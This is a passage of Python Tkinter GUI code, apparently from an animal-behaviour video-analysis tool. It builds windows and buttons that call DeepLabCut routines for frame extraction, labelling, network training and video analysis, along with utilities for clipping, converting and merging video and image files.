checkbox_useopencv = Checkbutton(label_extractframes, text='True', variable=self.var_useopencv)
# extractframecommand
button_extractframe = Button(label_extractframes, text='Extract Frames', command=self.dlc_extractframes_command)
##########label Frames#####
label_labelframes = LabelFrame(tab4, text='Label Frames', font=("Helvetica",12,'bold'),padx=15,pady=5)
self.button_label_frames = Button(label_labelframes, text='Label Frames', command=self.dlc_label_frames_command)
##########Check Labels#####
label_checklabels = LabelFrame(tab4, text='Check Labels', font=("Helvetica",12,'bold'),padx=15,pady=5)
self.button_check_labels = Button(label_checklabels, text='Check Labelled Frames', command=self.dlc_check_labels_command)
####generate training sets#####
label_generate_trainingsets = LabelFrame(tab7,text='Generate Training Set',font =("Helvetica",12,'bold'),padx=15,pady=5)
self.button_generate_trainingsets = Button(label_generate_trainingsets, text='Generate training set',command=self.dlc_generate_trainingsets_command)
#####train network####
label_train_network = LabelFrame(tab7,text= 'Train Network',font =("Helvetica",12,'bold'),padx=15,pady=5)
self.label_iteration = Entry_Box(label_train_network,'iteration','10')
self.button_update_iteration = Button(label_train_network,text='Update iteration',command =lambda:updateiteration(self.label_set_configpath.file_path,self.label_iteration.entry_get))
self.init_weight = FileSelect(label_train_network,'init_weight ',title='Select training weight, eg: .DATA-00000-OF-00001 File')
self.update_init_weight = Button(label_train_network,text='Update init_weight',command=lambda:update_init_weight(self.label_set_configpath.file_path,self.init_weight.file_path))
self.button_train_network = Button(label_train_network, text='Train Network',command=self.dlc_train_network_command)
#######evaluate network####
label_eva_network = LabelFrame(tab7,text='Evaluate Network',font = ("Helvetica",12,'bold'),padx=15,pady=5)
self.button_evaluate_network = Button(label_eva_network, text='Evaluate Network',command=self.dlc_evaluate_network_command)
#####video analysis####
label_video_analysis = LabelFrame(tab10,text='Video Analysis',font=("Helvetica",12,'bold'),padx=15,pady=5)
#singlevideoanalysis
label_singlevideoanalysis = LabelFrame(label_video_analysis,text='Single Video Analysis',pady=5,padx=5)
self.videoanalysispath = FileSelect(label_singlevideoanalysis, "Video path",title='Select a video file')
button_vidanalysis = Button(label_singlevideoanalysis, text='Single Video Analysis', command=self.dlc_video_analysis_command1)
#multi video analysis
label_multivideoanalysis = LabelFrame(label_video_analysis,text='Multiple Videos Analysis',pady=5,padx=5)
self.videofolderpath = FolderSelect(label_multivideoanalysis,'Folder Path',title='Select video folder')
self.video_type = Entry_Box(label_multivideoanalysis,'Video type(eg:mp4,avi):','18')
button_multivideoanalysis = Button(label_multivideoanalysis,text='Multi Videos Analysis',command=self.dlc_video_analysis_command2)
#### plot####
label_plot = LabelFrame(tab10,text='Plot Video Graph',font=("Helvetica",12,'bold'),padx=15,pady=5)
# videopath
self.videoplotpath = FileSelect(label_plot, "Video path",title='Select a video file')
# plot button
button_plot = Button(label_plot, text='Plot Results', command=self.dlc_plot_videoresults_command)
#####create video####
label_createvideo = LabelFrame(tab10,text='Create Video',font=("Helvetica",12,'bold'),padx=15,pady=5)
# videopath
self.createvidpath = FileSelect(label_createvideo, "Video path",title='Select a video file')
# save frames
self.var_saveframes = IntVar()
checkbox_saveframes = Checkbutton(label_createvideo, text='Save Frames', variable=self.var_saveframes)
# create video button
button_createvideo = Button(label_createvideo, text='Create Video', command=self.dlc_create_video_command)
######Extract Outliers####
label_extractoutlier = LabelFrame(tab13,text='Extract Outliers',font=("Helvetica",12,'bold'),pady=5,padx=5)
self.label_extractoutliersvideo = FileSelect(label_extractoutlier,'Videos to correct:',title='Select a video file')
button_extractoutliers = Button(label_extractoutlier,text='Extract Outliers',command =lambda:deeplabcut.extract_outlier_frames(self.label_set_configpath.file_path, [str(self.label_extractoutliersvideo.file_path)],automatic=True) )
####label outliers###
label_labeloutliers = LabelFrame(tab13,text='Label Outliers',font =("Helvetica",12,'bold'),pady=5,padx=5)
button_refinelabels = Button(label_labeloutliers,text='Refine Outliers',command=lambda:deeplabcut.refine_labels(self.label_set_configpath.file_path))
####merge labeled outliers ###
label_mergeoutliers = LabelFrame(tab13,text='Merge Labelled Outliers',font=("Helvetica",12,'bold'),pady=5,padx=5)
button_mergelabeledoutlier = Button(label_mergeoutliers,text='Merge Labelled Outliers',command=lambda:deeplabcut.merge_datasets(self.label_set_configpath.file_path))
#organize
labelframe_loadmodel.grid(row=0,sticky=W,pady=5)
self.label_set_configpath.grid(row=0,sticky=W)
label_generatetempyaml.grid(row=1,sticky=W)
label_tempyamlsingle.grid(row=0,sticky=W)
self.label_genyamlsinglevideo.grid(row=0,sticky=W)
button_generatetempyaml_single.grid(row=1,sticky=W)
label_tempyamlmulti.grid(row=1,sticky=W)
self.label_genyamlmultivideo.grid(row=0,sticky=W)
button_generatetempyaml_multi.grid(row=1,sticky=W)
label_tempyml.grid(row=2,sticky=W)
label_tempyml2.grid(row=3, sticky=W)
labelframe_singlemultivid.grid(row=2,sticky=W,pady=5)
labelframe_singlevid.grid(row=0,sticky=W)
self.label_set_singlevid.grid(row=0,sticky=W)
button_add_single_video.grid(row=1,sticky=W)
labelframe_multivid.grid(row=1,sticky=W)
self.label_video_folder.grid(row=0,sticky=W)
button_add_multi_video.grid(row=1,sticky=W)
label_extractframes.grid(row=3,column=0, sticky=W,pady=5,padx=5)
self.label_numframes2pick.grid(row=0,sticky=W)
label_mode.grid(row=1, sticky=W)
checkbox_auto.grid(row=2, sticky=W)
checkbox_manual.grid(row=3, sticky=W)
label_algo.grid(row=4, sticky=W)
checkbox_uniform.grid(row=5, sticky=W)
checkbox_kmean.grid(row=6, sticky=W)
self.label_clusterresize.grid(row=7, sticky=W)
self.label_clusterstep.grid(row=8, sticky=W)
label_clustercolor.grid(row=9, sticky=W)
checkbox_clustercolor.grid(row=10, sticky=W)
label_useopencv.grid(row=11, sticky=W)
checkbox_useopencv.grid(row=12, sticky=W)
button_extractframe.grid(row=13,sticky=W)
label_labelframes.grid(row=3,column=1,sticky=W+N,pady=5,padx=5)
self.button_label_frames.grid(row=0,sticky=W)
label_checklabels.grid(row=3,column=2,sticky=W+N,pady=5,padx=5)
self.button_check_labels.grid(row=0,sticky=W)
label_generate_trainingsets.grid(row=6,sticky=W,pady=5)
self.button_generate_trainingsets.grid(row=0,sticky=W)
label_train_network.grid(row=7,sticky=W,pady=5)
self.label_iteration.grid(row=0,column=0,sticky=W)
self.button_update_iteration.grid(row=0,column=1,sticky=W)
self.init_weight.grid(row=1,column=0,sticky=W)
self.update_init_weight.grid(row=1,column=1,sticky=W)
self.button_train_network.grid(row=2,sticky=W)
label_eva_network.grid(row=8,sticky=W,pady=5)
self.button_evaluate_network.grid(row=0,sticky=W)
#video analysis
label_video_analysis.grid(row=9,sticky=W,pady=5)
label_singlevideoanalysis.grid(row=0,sticky=W,pady=5)
label_multivideoanalysis.grid(row=1,sticky=W,pady=5)
self.videoanalysispath.grid(row=0,sticky=W)
button_vidanalysis.grid(row=2,sticky=W)
self.videofolderpath.grid(row=3,sticky=W,pady=5)
self.video_type.grid(row=4,sticky=W)
button_multivideoanalysis.grid(row=5,sticky=W)
label_plot.grid(row=10,sticky=W,pady=5)
self.videoplotpath.grid(row=0,sticky=W)
button_plot.grid(row=1,sticky=W)
label_createvideo.grid(row=11,sticky=W,pady=5)
self.createvidpath.grid(row=0,sticky=W)
checkbox_saveframes.grid(row=1,sticky=W)
button_createvideo.grid(row=2,sticky=W)
label_extractoutlier.grid(row=12,sticky=W,pady=5)
self.label_extractoutliersvideo.grid(row=0,sticky=W)
button_extractoutliers.grid(row=1,sticky=W)
label_labeloutliers.grid(row=13,sticky=W,pady=5)
button_refinelabels.grid(row=0,sticky=W)
label_mergeoutliers.grid(row=14,sticky=W,pady=5)
button_mergelabeledoutlier.grid(row=0,sticky=W)
def dlc_addsinglevideo(self):
try:
deeplabcut.add_new_videos(self.label_set_configpath.file_path, [str(self.label_set_singlevid.file_path)],copy_videos=True)
except FileNotFoundError:
print('...')
print('Failed to add video, please load a .yaml file and select a video file')
def generateyamlmulti(self):
try:
config_path = self.label_set_configpath.file_path
directory = self.label_genyamlmultivideo.folder_path
filesFound = []
########### FIND FILES ###########
for i in os.listdir(directory):
if i.lower().endswith(('.avi', '.mp4')):
a = os.path.join(directory, i)
filesFound.append(a)
print(a)
print(filesFound)
generatetempyaml_multi(config_path,filesFound)
except FileNotFoundError:
print('Failed to add videos. Please load a .yaml file and select a video folder.')
def dlc_addmultivideo_command(self):
try:
config_path = self.label_set_configpath.file_path
directory = self.label_video_folder.folder_path
filesFound = []
########### FIND FILES ###########
for i in os.listdir(directory):
if i.lower().endswith(('.avi', '.mp4')):
a = os.path.join(directory, i)
deeplabcut.add_new_videos(config_path, [str(a)], copy_videos=True)
print("Videos added.")
except FileNotFoundError:
print('Failed to add videos. Please load a .yaml file and select a video folder.')
def dlc_extractframes_command(self):
config_path = self.label_set_configpath.file_path
select_numfram2pick(config_path,self.label_numframes2pick.entry_get)
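# translate the GUI selections below into deeplabcut.extract_frames() arguments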
if self.mode.get()==1:
modes = str('automatic')
elif self.mode.get()==2:
modes = str('manual')
if self.algo.get()==1:
algorithm = str('uniform')
elif self.algo.get()==2:
algorithm = str('kmeans')
if len(self.label_clusterresize.entry_get)==0:
clusterresizewidth = int(30)
else:
clusterresizewidth = int(self.label_clusterresize.entry_get)
if len(self.label_clusterstep.entry_get)==0:
clusterstep = int(1)
else:
clusterstep = int(self.label_clusterstep.entry_get)
if self.var_clustercolor.get()==1:
clustercolor = True
else:
clustercolor = False
if self.var_useopencv.get()==1:
useopencv = True
else:
useopencv = False
try:
print(config_path,modes,algorithm,clusterstep,clusterresizewidth,clustercolor,useopencv)
deeplabcut.extract_frames(config_path,mode=modes,algo=algorithm,crop=False,userfeedback=False,cluster_step=clusterstep,cluster_resizewidth=clusterresizewidth,cluster_color=clustercolor,opencv=useopencv)
except:
print('Failed to extract frames. Please make sure all the information is filled in.')
def dlc_label_frames_command(self):
config_path = self.label_set_configpath.file_path
deeplabcut.label_frames(config_path)
def dlc_check_labels_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.check_labels(config_path)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_generate_trainingsets_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.create_training_dataset(config_path, num_shuffles=1)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_train_network_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.train_network(config_path, shuffle=1, gputouse=0)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_evaluate_network_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.evaluate_network(config_path, plotting=True)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_video_analysis_command1(self):
try:
config_path = self.label_set_configpath.file_path
vid_name = os.path.basename(self.videoanalysispath.file_path)
vid_type = vid_name[-4:]
deeplabcut.analyze_videos(config_path, [str(self.videoanalysispath.file_path)], shuffle=1,save_as_csv=True, videotype=vid_type)
except FileNotFoundError:
print('Please load .yaml file and select video path to continue')
def dlc_video_analysis_command2(self):
try:
config_path = self.label_set_configpath.file_path
folder_path = self.videofolderpath.folder_path
vid_type = self.video_type.entry_get
deeplabcut.analyze_videos(config_path, [str(folder_path)], shuffle=1,save_as_csv=True, videotype=vid_type)
except FileNotFoundError:
print('Please load .yaml file and select folder with videos to continue')
def dlc_plot_videoresults_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.plot_trajectories(config_path, [str(self.videoplotpath.file_path)])
except FileNotFoundError:
print('Please load .yaml file and select a video file to plot graph')
def dlc_create_video_command(self):
try:
config_path = self.label_set_configpath.file_path
if self.var_saveframes.get()==1:
saveframes=True
else:
saveframes=False
vid_name = os.path.basename(self.createvidpath.file_path)
vid_type = vid_name[-4:]
deeplabcut.create_labeled_video(config_path, [str(self.createvidpath.file_path)],save_frames=saveframes, videotype=vid_type)
except FileNotFoundError:
print('Please select .yaml file and select a video to continue.')
class shorten_video:
def __init__(self):
# Popup window
shortenvid = Toplevel()
shortenvid.minsize(200, 200)
shortenvid.wm_title("Clip video")
# videopath
self.videopath1selected = FileSelect(shortenvid, "Video path",title='Select a video file')
#timeframe for start and end cut
label_cutvideomethod1 = LabelFrame(shortenvid,text='Method 1',font='bold',padx=5,pady=5)
label_timeframe = Label(label_cutvideomethod1, text='Please enter the time frame in hh:mm:ss format')
self.label_starttime = Entry_Box(label_cutvideomethod1,'Start at:','8')
self.label_endtime = Entry_Box(label_cutvideomethod1, 'End at:','8')
CreateToolTip(label_cutvideomethod1,
'Method 1 cuts the video between the two specified timestamps (e.g., Start at: 00:00:00 and End at: 00:01:00 creates a new video spanning the first minute of the chosen video).')
#express time frame
label_cutvideomethod2 = LabelFrame(shortenvid,text='Method 2',font='bold',padx=5,pady=5)
label_method2 = Label(label_cutvideomethod2,text='Method 2 trims the start of the video and keeps the rest (e.g., an input of 3 seconds removes the first 3 seconds of the video).')
# self.var_express = IntVar()
# checkbox_express = Checkbutton(label_cutvideomethod2, text='Check this box to use Method 2', variable=self.var_express)
self.label_time = Entry_Box(label_cutvideomethod2,'Seconds:','8')
CreateToolTip(label_cutvideomethod2,'Method 2 trims the start of the video and keeps the rest (e.g., an input of 3 seconds removes the first 3 seconds of the video).')
#button to cut video
button_cutvideo1 = Button(label_cutvideomethod1, text='Cut Video', command=lambda:shortenvideos1(self.videopath1selected.file_path,self.label_starttime.entry_get,self.label_endtime.entry_get))
button_cutvideo2 = Button(label_cutvideomethod2,text='Cut Video',command =lambda:shortenvideos2(self.videopath1selected.file_path,self.label_time.entry_get))
#organize
self.videopath1selected.grid(row=0,sticky=W)
label_cutvideomethod1.grid(row=1,sticky=W,pady=5)
label_timeframe.grid(row=0,sticky=W)
self.label_starttime.grid(row=1,sticky=W)
self.label_endtime.grid(row=2,sticky=W)
button_cutvideo1.grid(row=3)
label_cutvideomethod2.grid(row=2,sticky=W,pady=5)
label_method2.grid(row=0,sticky=W)
# checkbox_express.grid(row=1,sticky=W)
self.label_time.grid(row=2,sticky=W)
button_cutvideo2.grid(row=3)
class multi_shorten_video:
def __init__(self):
# Popup window
self.multishort = Toplevel()
self.multishort.minsize(200, 200)
self.multishort.wm_title("Clip video into multiple videos")
self.lblmultishort = LabelFrame(self.multishort, text='Split videos into different parts', font='bold', padx=5, pady=5)
# videopath
self.videopath1selected = FileSelect(self.lblmultishort, "Video path", title='Select a video file')
self.noclips = Entry_Box(self.lblmultishort,'# of clips','8')
confirmclip = Button(self.lblmultishort,text='Confirm',command=lambda:self.expand(self.noclips.entry_get))
runbutton = Button(self.multishort,text='Clip video', command= lambda:splitvideos(self.videopath1selected.file_path,self.allentries),fg='navy',font=("Helvetica",12,'bold'))
#organize
self.lblmultishort.grid(row=0,sticky=W)
self.videopath1selected.grid(row=1,sticky=W,columnspan=2)
self.noclips.grid(row=2,sticky=W)
confirmclip.grid(row=2,column=1,sticky=W)
runbutton.grid(row=5)
def expand(self,noclips):
try:
self.table.destroy()
except:
pass
noclips = int(noclips)
self.table = LabelFrame(self.multishort)
lbl_clip = Label(self.table,text='Clip #')
lbl_start = Label(self.table,text='Start Time')
lbl_stop = Label(self.table,text='Stop Time')
#organize table
self.table.grid(row=2,sticky=W)
lbl_clip.grid(row=0,column=0,sticky=W)
lbl_start.grid(row=0,column=1)
lbl_stop.grid(row=0,column=2)
#list
self.ent1 = [0] * noclips
self.ent2 = [0] * noclips
self.ent3 = [0] * noclips
for i in range(noclips):
self.ent1[i] = Label(self.table,text='Clip '+str(i+1))
self.ent1[i].grid(row=i+2,sticky=W)
self.ent2[i] = Entry(self.table)
self.ent2[i].grid(row=i+2,column=1,sticky=W)
self.ent3[i] = Entry(self.table)
self.ent3[i].grid(row=i+2,column=2,sticky=W)
self.allentries = [self.ent2,self.ent3]
class change_imageformat:
def __init__(self):
# Popup window
chgimgformat = Toplevel()
chgimgformat.minsize(200, 200)
chgimgformat.wm_title("Change image format")
#select directory
self.folderpath1selected = FolderSelect(chgimgformat,"Image directory",title='Select folder with images')
#change image format
label_filetypein = LabelFrame(chgimgformat,text= 'Original image format',font=("Helvetica",12,'bold'),padx=15,pady=5)
# Checkbox input
self.varfiletypein = IntVar()
checkbox_c1 = Radiobutton(label_filetypein, text=".png", variable=self.varfiletypein, value=1)
checkbox_c2 = Radiobutton(label_filetypein, text=".jpeg", variable=self.varfiletypein, value=2)
checkbox_c3 = Radiobutton(label_filetypein, text=".bmp", variable=self.varfiletypein, value=3)
#ouput image format
label_filetypeout = LabelFrame(chgimgformat,text='Output image format',font=("Helvetica",12,'bold'),padx=15,pady=5)
#checkbox output
self.varfiletypeout = IntVar()
checkbox_co1 = Radiobutton(label_filetypeout, text=".png", variable=self.varfiletypeout, value=1)
checkbox_co2 = Radiobutton(label_filetypeout, text=".jpeg", variable=self.varfiletypeout, value=2)
checkbox_co3 = Radiobutton(label_filetypeout, text=".bmp", variable=self.varfiletypeout, value=3)
#button
button_changeimgformat = Button(chgimgformat, text='Convert image file format', command=self.changeimgformatcommand)
#organized
self.folderpath1selected.grid(row=0,column=0)
label_filetypein.grid(row=1,column=0,pady=5)
checkbox_c1.grid(row=2,column=0)
checkbox_c2.grid(row=3,column=0)
checkbox_c3.grid(row=4,column=0)
label_filetypeout.grid(row=5,column=0,pady=5)
checkbox_co1.grid(row=6,column=0)
checkbox_co2.grid(row=7,column=0)
checkbox_co3.grid(row=8, column=0)
button_changeimgformat.grid(row=9,pady=5)
def changeimgformatcommand(self):
if self.varfiletypein.get()==1:
filetypein = str('png')
elif self.varfiletypein.get()==2:
filetypein = str('jpeg')
elif self.varfiletypein.get()==3:
filetypein = str('bmp')
if self.varfiletypeout.get()==1:
filetypeout = str('png')
elif self.varfiletypeout.get()==2:
filetypeout = str('jpeg')
elif self.varfiletypeout.get() == 3:
filetypeout = str('bmp')
cif=changeimageformat(self.folderpath1selected.folder_path, filetypein, filetypeout)
print('Images converted to '+ str(cif) + ' format')
class convert_video:
def __init__(self):
# Popup window
convertvid = Toplevel()
convertvid.minsize(400, 400)
convertvid.wm_title("Convert video format")
#multi video
label_multivideo = LabelFrame(convertvid, text='Convert multiple videos',font=("Helvetica",12,'bold'),padx=5,pady=5)
vid_dir = FolderSelect(label_multivideo,'Video directory',title='Select folder with videos')
ori_format = Entry_Box(label_multivideo,'Input format','12')
final_format = Entry_Box(label_multivideo,'Output format','12')
button_convertmultivid = Button(label_multivideo,text='Convert multiple videos',command = lambda: batch_convert_videoformat(vid_dir.folder_path,ori_format.entry_get,final_format.entry_get))
#single video
label_convert = LabelFrame(convertvid,text='Convert single video',font=("Helvetica",12,'bold'),padx=5,pady=5)
self.videopath1selected = FileSelect(label_convert, "Video path",title='Select a video file')
self.vvformat = IntVar()
checkbox_v1 = Radiobutton(label_convert, text="Convert .avi to .mp4", variable=self.vvformat, value=1)
checkbox_v2 = Radiobutton(label_convert, text="Convert .mp4 into a PowerPoint-supported format", variable=self.vvformat, value=2)
#button
button_convertvid= Button(label_convert, text='Convert video format', command=self.convertavitomp)
#organize
label_multivideo.grid(row=0,sticky=W)
vid_dir.grid(row=0,sticky=W)
ori_format.grid(row=1,sticky=W)
final_format.grid(row=2,sticky=W)
button_convertmultivid.grid(row=3,pady=10)
label_convert.grid(row=1,sticky=W)
self.videopath1selected.grid(row=0,sticky=W)
checkbox_v1.grid(row=1,column=0,sticky=W)
checkbox_v2.grid(row=2,column=0,sticky=W)
button_convertvid.grid(row=3,column=0,pady=10)
def convertavitomp(self):
if self.vvformat.get()== 1:
cavi = convertavitomp4(self.videopath1selected.file_path)
print('Video converted to ' + cavi)
elif self.vvformat.get()== 2:
cavi = convertpowerpoint(self.videopath1selected.file_path)
print('Video converted to ' + cavi)
class extract_specificframes:
def __init__(self):
# Popup window
extractsf = Toplevel()
extractsf.minsize(200, 200)
extractsf.wm_title("Extract defined Frames")
# videopath
self.videopath1selected = FileSelect(extractsf, "Video path",title='Select a video file')
#entry boxes for frames to extract
label_frametitle = LabelFrame(extractsf, text='Frames to be extracted',padx=5,pady=5)
self.label_startframe1 = Entry_Box(label_frametitle,'Start Frame:','10')
self.label_endframe1 = Entry_Box(label_frametitle, 'End Frame:','10')
#button
button_extractsf = Button(label_frametitle, text='Extract Frames', command=self.extractsfcommand)
#organize
self.videopath1selected.grid(row=0,column=0,sticky=W,pady=10)
label_frametitle.grid(row=1,column=0,sticky=W)
self.label_startframe1.grid(row=2,column=0,sticky=W)
self.label_endframe1.grid(row=3,column=0,sticky=W)
button_extractsf.grid(row=4,pady=5)
def extractsfcommand(self):
startframe1 = self.label_startframe1.entry_get
endframe1 = self.label_endframe1.entry_get
extractspecificframe(self.videopath1selected.file_path, startframe1, endframe1)
print('Frames were extracted from ' + str(startframe1) + ' to ' + str(endframe1))
def extract_allframes():
# Popup window
extractaf = Toplevel()
extractaf.minsize(300, 300)
extractaf.wm_title("Extract all frames")
#single video
singlelabel = LabelFrame(extractaf,text='Single video',padx=5,pady=5,font='bold')
# videopath
videopath = FileSelect(singlelabel, "Video path",title='Select a video file')
#button
button_extractaf = Button(singlelabel, text='Extract Frames (Single video)', command= lambda:extract_allframescommand(videopath.file_path))
#multivideo
multilabel = LabelFrame(extractaf,text='Multiple videos',padx=5,pady=5,font='bold')
folderpath = FolderSelect(multilabel,'Folder path',title=' Select video folder')
button_extractmulti = Button(multilabel,text='Extract Frames (Multiple videos)',command=lambda:batch_extract_allframes(folderpath.folder_path))
#organize
singlelabel.grid(row=0,sticky=W,pady=10)
videopath.grid(row=0,sticky=W)
button_extractaf.grid(row=1,sticky=W,pady=10)
multilabel.grid(row=1,sticky=W,pady=10)
folderpath.grid(row=0,sticky=W)
button_extractmulti.grid(row=1,sticky=W,pady=10)
def CSV2parquet():
csv2parq = Toplevel()
csv2parq.minsize(300, 300)
csv2parq.wm_title("Convert CSV directory to parquet")
multilabel = LabelFrame(csv2parq, text='Select CSV directory', padx=5, pady=5, font='bold')
folderpath = FolderSelect(multilabel, 'CSV folder path', title=' Select CSV folder')
button_extractmulti = Button(multilabel, text='Convert CSV to parquet', command=lambda: convert_csv_to_parquet(folderpath.folder_path))
multilabel.grid(row=1, sticky=W, pady=10)
folderpath.grid(row=0, sticky=W)
button_extractmulti.grid(row=1, sticky=W, pady=10)
def parquet2CSV():
parq2csv = Toplevel()
parq2csv.minsize(300, 300)
parq2csv.wm_title("Convert parquet directory to CSV")
multilabel = LabelFrame(parq2csv, text='Select parquet directory', padx=5, pady=5, font='bold')
folderpath = FolderSelect(multilabel, 'Parquet folder path', title=' Select parquet folder')
button_extractmulti = Button(multilabel, text='Convert parquet to CSV', command=lambda: convert_parquet_to_csv(folderpath.folder_path))
multilabel.grid(row=1, sticky=W, pady=10)
folderpath.grid(row=0, sticky=W)
button_extractmulti.grid(row=1, sticky=W, pady=10)
class multicropmenu:
def __init__(self):
multimenu = Toplevel()
multimenu.minsize(300, 300)
multimenu.wm_title("Multi Crop")
self.inputfolder = FolderSelect(multimenu,"Video Folder ")
self.outputfolder = FolderSelect(multimenu,"Output Folder")
self.videotype = Entry_Box(multimenu,"Video type","10")
self.croptimes = Entry_Box(multimenu,"# of crops","10")
button_multicrop = Button(multimenu,text='Crop',command=lambda:multicrop(self.videotype.entry_get,self.inputfolder.folder_path,self.outputfolder.folder_path,self.croptimes.entry_get))
#organize
self.inputfolder.grid(row=0,sticky=W,pady=2)
self.outputfolder.grid(row=1,sticky=W,pady=2)
self.videotype.grid(row=2,sticky=W,pady=2)
self.croptimes.grid(row=3,sticky=W,pady=2)
button_multicrop.grid(row=4,pady=10)
class changefps:
def __init__(self):
fpsmenu = Toplevel()
fpsmenu.minsize(200, 200)
fpsmenu.wm_title("Change frame rate of video")
# videopath
videopath = FileSelect(fpsmenu, "Video path",title='Select a video file')
#fps
label_fps= Entry_Box(fpsmenu,'Output fps','10')
#button
button_fps = Button(fpsmenu,text='Convert',command=lambda:changefps_singlevideo(videopath.file_path,label_fps.entry_get))
#organize
videopath.grid(row=0,sticky=W)
label_fps.grid(row=1,sticky=W)
button_fps.grid(row=2)
class changefpsmulti:
def __init__(self):
multifpsmenu = Toplevel()
multifpsmenu.minsize(400, 200)
multifpsmenu.wm_title("Change frame rate of videos in a folder")
# videopath
videopath = FolderSelect(multifpsmenu, "Folder path", title='Select folder with videos')
# fps
label_fps = Entry_Box(multifpsmenu, 'Output fps', '10')
# button
button_fps = Button(multifpsmenu, text='Convert',
command=lambda: changefps_multivideo(videopath.folder_path, label_fps.entry_get))
# organize
videopath.grid(row=0, sticky=W)
label_fps.grid(row=1, sticky=W)
button_fps.grid(row=2)
class extract_seqframe:
def __init__(self):
extractseqtoplevel = Toplevel()
extractseqtoplevel.minsize(200, 200)
extractseqtoplevel.wm_title("Extract All Frames from Seq files")
# videopath
videopath = FileSelect(extractseqtoplevel, "Video Path",title='Select a video file')
# button
button_extractseqframe = Button(extractseqtoplevel, text='Extract All Frames', command=lambda: extract_seqframescommand(videopath.file_path))
#organize
videopath.grid(row=0)
button_extractseqframe.grid(row=1)
class mergeframeffmpeg:
def __init__(self):
# Popup window
mergeffmpeg = Toplevel()
mergeffmpeg.minsize(250, 250)
mergeffmpeg.wm_title("Merge images to video")
# select directory
self.folderpath1selected = FolderSelect(mergeffmpeg,"Working Directory",title='Select folder with frames')
# settings
label_settings = LabelFrame(mergeffmpeg,text='Settings',padx=5,pady=5)
self.label_imgformat = Entry_Box(label_settings, 'Image format','10')
label_to = Label(label_settings,text=' to ',width=0)
self.label_vidformat = Entry_Box(label_settings,'Video format','10')
self.label_bitrate = Entry_Box(label_settings,'Bitrate','10')
self.label_fps = Entry_Box(label_settings,'fps','10')
#button
button_mergeimg = Button(label_settings, text='Merge Images', command=self.mergeframeffmpegcommand)
#organize
label_settings.grid(row=1,pady=10)
self.folderpath1selected.grid(row=0,column=0,pady=10)
self.label_imgformat.grid(row=1,column=0,sticky=W)
label_to.grid(row=1,column=1)
self.label_vidformat.grid(row=1,column=2,sticky=W)
self.label_fps.grid(row=2,column=0,sticky=W,pady=5)
self.label_bitrate.grid(row=3,column=0,sticky=W,pady=5)
button_mergeimg.grid(row=4,column=1,sticky=E,pady=10)
def mergeframeffmpegcommand(self):
imgformat = self.label_imgformat.entry_get
vidformat = self.label_vidformat.entry_get
bitrate = self.label_bitrate.entry_get
fps = self.label_fps.entry_get
mergemovieffmpeg(self.folderpath1selected.folder_path,fps,vidformat,bitrate,imgformat)
print('Video created.')
class creategif:
def __init__(self):
# Popup window
create_gif = Toplevel()
create_gif.minsize(250, 250)
create_gif.wm_title("Generate Gif from video")
#Create Gif
label_creategif = LabelFrame(create_gif,text='Video to Gif',padx=5,pady=5,font='bold')
# select video to convert to gif
videoselected = FileSelect(label_creategif, 'Video path',title='Select a video file')
label_starttime = Entry_Box(label_creategif,'Start time(s)','12')
label_duration = Entry_Box(label_creategif,'Duration(s)','12')
label_size = Entry_Box(label_creategif,'Width','12')
size_description = Label(label_creategif,text='example width: 240,360,480,720,1080',font=("Times", 10, "italic"))
#convert
button_creategif = Button(label_creategif,text='Generate Gif',command=lambda :generategif(videoselected.file_path,label_starttime.entry_get,label_duration.entry_get,label_size.entry_get))
#organize
label_creategif.grid(row=0,sticky=W)
videoselected.grid(row=0,sticky=W,pady=5)
label_starttime.grid(row=1,sticky=W)
label_duration.grid(row=2,sticky=W)
label_size.grid(row=3,sticky=W)
size_description.grid(row=4,sticky=W)
button_creategif.grid(row=5,sticky=E,pady=10)
class new_window:
def open_Folder(self):
print("Current directory is %s" % os.getcwd())
folder = askdirectory(title='Select Frame Folder')
os.chdir(folder)
print("Working directory is %s" % os.getcwd())
def __init__(self, script_name):
window = Tk()
folder = Frame(window)
folder.grid(row = 0, column = 1, sticky = N)
choose_folder = Label(folder, text="Choose Folder")
choose_folder.grid(row = 0, column = 0, sticky = W)
select_folder = Button(folder, text="Choose Folder...", command=self.open_Folder)
select_folder.grid(row = 0, column = 0, sticky = W)
run_script = Button(folder, text="Run", command=script_name.main)
run_script.grid(columnspan = 2, sticky = S)
def createWindow(scriptname):
new_window(scriptname)
class get_coordinates_from_video:
def __init__(self):
# Popup window
getcoord = Toplevel()
getcoord.minsize(200, 200)
getcoord.wm_title('Get Coordinates in Video')
# settings files selected
self.videopath1selected = FileSelect(getcoord, "Video selected",title='Select a video file')
# label for known mm
self.label_knownmm = Entry_Box(getcoord,'Known length in real life (mm)','0')
#button
button_getcoord = Button(getcoord, text='Get Distance', command=self.getcoord)
#organize
self.videopath1selected.grid(row=0,column=0,pady=10,sticky=W)
self.label_knownmm.grid(row=1,column=0,pady=10,sticky=W)
button_getcoord.grid(row=2,column=0,pady=10)
def getcoord(self):
filename= self.videopath1selected.file_path
knownmm_value = self.label_knownmm.entry_get
if knownmm_value == '':
print('Please enter the known length in millimeters to continue')
elif filename != '' and filename != 'No file selected':
getco = get_coordinates_nilsson(self.videopath1selected.file_path,knownmm_value)
print('The distance between the two set points is ', str(getco))
else:
print('Please select a video')
class project_config:
def __init__(self):
self.all_entries = []
self.allmodels = []
# Popup window
self.toplevel = Toplevel()
self.toplevel.minsize(750, 750)
self.toplevel.wm_title("Project Configuration")
#tab
tab_parent = ttk.Notebook(hxtScrollbar(self.toplevel))
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
#tab title
tab_parent.add(tab1,text=f'{"[ Generate project config ]": ^20s}')
tab_parent.add(tab2, text=f'{"[ Import videos into project folder ]": ^20s}')
tab_parent.add(tab3, text=f'{"[ Import tracking data ]": ^20s}')
tab_parent.add(tab4, text=f'{"[ Extract frames into project folder ]": ^20s}')
#initiate tab
tab_parent.grid(row=0)
# General Settings
